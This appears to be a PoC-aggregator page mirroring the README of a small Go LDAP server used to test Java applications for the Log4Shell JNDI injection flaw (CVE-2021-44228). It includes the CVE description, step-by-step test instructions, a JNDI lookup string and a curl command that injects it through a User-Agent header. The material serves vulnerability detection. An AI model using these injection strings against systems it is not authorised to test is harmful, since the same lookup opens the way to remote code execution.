CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source

https://github.com/rakutentech/jndi-ldap-test-server

Associated Vulnerability

Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Description

A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228.

Readme

[![Download](https://img.shields.io/github/v/release/rakutentech/jndi-ldap-test-server?color=green&label=Download%20Latest)](https://github.com/rakutentech/jndi-ldap-test-server/releases/latest)

# jndi-ldap-test-server

This is a minimalistic LDAP server that is meant for test vulnerability to
JNDI+LDAP injection attacks in Java, especially
[CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228).

## How to test vulnerability to CVE-2021-44228

1. Download the test server binary for your platform (you can find all binaries
   under [Releases](https://github.com/rakutentech/jndi-ldap-test-server/releases)).
2. Run the test server on some IP address accessible by the application you want
   to test. It's the easiest if you can run the server on the same host as your
   app (localhost).
3. Find any untrusted externally provided that your application receives from
   the outside and logs.
4. Force your app to log a string that includes:
   ```
   ${jndi:ldap://localhost:1389/Test}
   ```
   Please replace `localhost` with your own servers' IP or domain name if you're
   not running the test server locally.

   For instance, if you are running an HTTP server which is logging the
   `User-Agent` HTTP header, you can test for vulnerability by calling this cURL
   command while the test server is running:
   ```bash
   curl my-host -H 'User-Agent: ${jndi:ldap://test-server-host:1389/Test}'
   ```
5. If your application is vulnerable, you should see an incoming connection on
   the test server, and the injected string will be replaced by the text `!!!
   VULNERABLE !!!` in your logs. If your application is not vulnerable, the
   injected string should not be substituted and the test server should not
   receive any connection.

File Snapshot


 [4.0K]  /data/pocs/c693ec1edc91d2eb4487d96f2f205702e03a9663
├── [4.0K]  args
│   ├── [1.3K]  args.go
│   ├── [ 815]  enum.go
│   └── [ 934]  enum_set.go
├── [ 337]  go.mod
├── [5.0K]  go.sum
├── [4.0K]  java
│   └── [4.0K]  serialization
│       └── [ 902]  serialization.go
├── [1.0K]  LICENSE
├── [1.2K]  main.go
├── [1.7K]  README.md
├── [4.0K]  routes
│   ├── [ 586]  bind.go
│   ├── [ 764]  exploit.go
│   ├── [ 255]  routes.go
│   └── [1.6K]  search.go
├── [4.0K]  scripts
│   └── [  97]  pack-binary
├── [1022]  server.go
└── [4.0K]  util
    ├── [4.0K]  logging
    │   ├── [1.3K]  determine_logger.go
    │   └── [1.4K]  stdadapter.go
    └── [4.0K]  wtf8
        └── [ 979]  wtf8.go

8 directories, 18 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!